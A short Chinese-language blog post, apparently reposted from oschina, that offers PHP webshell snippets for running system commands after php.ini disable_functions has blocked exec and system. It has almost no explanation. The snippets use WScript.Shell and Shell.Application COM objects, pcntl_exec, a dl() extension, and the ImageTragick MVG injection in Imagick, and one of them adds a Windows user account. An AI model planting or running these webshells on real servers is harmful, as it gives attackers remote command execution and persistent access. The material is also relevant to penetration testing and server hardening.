在渗透测试过程中可能经常会遇到上传webshell后,由于php.ini配置禁用了一些如exec(),shell_exec(),system()等执行系统命令的函数,导致无法执行系统命令,就此问题给出几种绕过方法。
话不多说,直接贴代码: ···math
<?php $phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!"); $exec=$phpwsh->exec("cmd.exe /c ".$_GET['c'].""); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?>
<?php ··· ··· header("Content-Type: text/plain"); $cmd="/tmp/exec"; @unlink($cmd); $c = "#!/usr/bin/env bash\n".$_GET[x]."> /tmp/output.txt\n"; file_put_contents($cmd, $c); chmod($cmd, 0777); $cd="/tmp/output.txt"; print_r(file_get_contents($cd)); switch (pcntl_fork()) { case 0: $ret = pcntl_exec($cmd); exit("case 0"); default: echo "case 1"; break; } ··· ··· <?php $phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!"); $exec=$phpwsh->ShellExecute("net"," user test test /add"); //$exec=$phpwsh->ShellExecute("cmd","/c net user test test /add"); ?>
··· ···
<?php $phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!"); $exec=$phpwsh->open("c:\\windows\\system32\\cmd.exe"); ?>
··· ···
<?php $a=new COM("Shell.Application"); $a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverb(); ?>
··· ···
<?php $a=new COM("Shell.Application"); $a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverbEx(); ?>
··· ···
<?php $command=$_POST[a]; $wsh = new COM('WScript.shell'); // 生成一个COM对象 $exec = $wsh->exec('cmd.exe /c '.$command); //调用对象方法来执行命令 $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput ?>
··· ···
<?php dl("dl.so"); //dl.so在extension_dir目录,如不在则用../../来实现调用 confirm_dl_compiled("$_GET[a]>1.txt"); ?>
··· ···
<?php echo "Disable Functions: " . ini_get('disable_functions') . "\n"; $command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd']; if ($command == '') { $command = 'id'; } $exploit = <<<EOF push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|$command")' pop graphic-context EOF; file_put_contents("KKKK.mvg", $exploit); $thumb = new Imagick(); $thumb->readImage('KKKK.mvg'); $thumb->writeImage('KKKK.png'); $thumb->clear(); $thumb->destroy(); unlink("KKKK.mvg"); unlink("KKKK.png"); ?>
··· ···
<?php $c=$_REQUEST['c']; $e = <<<EOF push graphic-context viewbox 0 0 640 480 fill 'url(https://"|$c")' pop graphic-context EOF; $i = new Imagick(); $i->readImageBlob($e); ?>
···
来源:oschina
链接:https://my.oschina.net/u/4380991/blog/3359172